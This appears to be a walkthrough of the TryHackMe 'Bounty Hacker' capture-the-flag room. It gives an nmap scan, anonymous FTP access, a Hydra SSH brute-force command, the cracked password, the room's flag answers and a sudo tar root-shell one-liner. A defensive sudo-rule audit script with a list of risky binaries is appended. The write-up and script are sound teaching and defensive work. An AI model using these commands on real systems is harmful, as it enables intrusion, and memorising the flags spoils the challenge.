Understanding the CTF Challenge
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
This guide walks you through a Capture The Flag (CTF) challenge on TryHackMe called "Bounty Hacker." You'll learn how to perform an nmap scan, use the services exposed on the open ports to gain a foothold, and escalate privileges to gain root access.
Key Points
- Initial Scan: Start with an nmap scan to identify open ports.
- FTP Exploitation: Use anonymous FTP login to retrieve important files.
- SSH Bruteforce: Utilize Hydra to brute-force SSH login.
- Privilege Escalation: Use sudo permissions to gain root access.
Initial Scan
Begin with an nmap scan to identify open ports and services:
nmap -sC -sV -A -T4 -v -p- 10.10.69.196
This scan reveals the following open ports:
Port | Service |
---|---|
21 | FTP |
22 | SSH |
80 | HTTP |
FTP Exploitation
The FTP service allows anonymous login. Connect using the ftp command:
ftp 10.10.69.196
Retrieve the files locks.txt and task.txt.
Who Wrote the Task List?
The task.txt file reveals the author:
Answer: lin
Bruteforcing SSH
The locks.txt file contains a list of passwords. Since port 22 (SSH) is open, you can use Hydra to brute-force the SSH login:
- Create a users.txt file with the username lin.
- Run Hydra with the wordlist:
hydra ssh://10.10.69.196 -L users.txt -P locks.txt
The successful login credentials are:
login: lin
password: RedDr4gonSynd1cat3
Retrieving user.txt
Connect to SSH using the discovered credentials to read the user.txt file:
Answer: THM{CR1M3_SyNd1C4T3}
Privilege Escalation
Run sudo -l to check the user's sudo permissions:
User lin may run the following commands on bountyhacker:
(root) /bin/tar
Use the following payload to escalate privileges:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Retrieve the root.txt file:
Answer: THM{80UN7Y_h4cK3r}
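From the defender's side, the (root) /bin/tar rule shown above is the misconfiguration: tar can launch other programs, so the rule amounts to a root shell. The script below is an added example, not part of the original walkthrough, that scans sudo -l output for rules of this kind; the RISKY list, the function name and every sample line except the tar rule are assumptions made for illustration.

```sh
#!/bin/sh
# Flag rules in `sudo -l` output that hand out binaries able to run other programs.
# RISKY: hand-picked subset of binaries GTFOBins lists under "sudo" (assumption; extend it).
RISKY="tar find vim vi less more awk env nmap perl python python3 bash sh"

# Constructed sample. Only the tar rule comes from the walkthrough; the rest is made up.
SAMPLE_SUDO_L='User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /sbin/reboot, /usr/bin/less /var/log/syslog
    (ALL : ALL) ALL'

audit_sudo_rules() {
    # Reads `sudo -l` output on stdin.
    # Prints one line per flagged command: RUNAS <TAB> COMMAND <TAB> FINDING
    #   unrestricted  the rule grants every command
    #   any-args      risky binary, caller chooses the arguments (the tar case)
    #   fixed-args    risky binary with arguments pinned in sudoers; still review it,
    #                 because pagers and editors stay interactive once started
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*/, "", line)
        runas = substr(line, 1, index(line, ")"))   # e.g. "(root)"
        rest  = substr(line, index(line, ")") + 1)
        gsub(/[A-Z_]+:[ \t]*/, "", rest)            # drop tags such as NOPASSWD:
        m = split(rest, cmds, ",")
        for (j = 1; j <= m; j++) {
            c = cmds[j]
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            if (c == "") continue
            if (c == "ALL") { printf "%s\t%s\tunrestricted\n", runas, c; continue }
            k = split(c, w, /[ \t]+/)               # w[1] is the binary path
            p = split(w[1], parts, "/")
            base = parts[p]
            if (base in bad)
                printf "%s\t%s\t%s\n", runas, c, (k > 1 ? "fixed-args" : "any-args")
        }
    }'
}

printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
```

On a real host, an administrator can feed it live data with sudo -l -U <user> | audit_sudo_rules.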
Learn More
For more information on privilege escalation techniques, visit GTFOBins.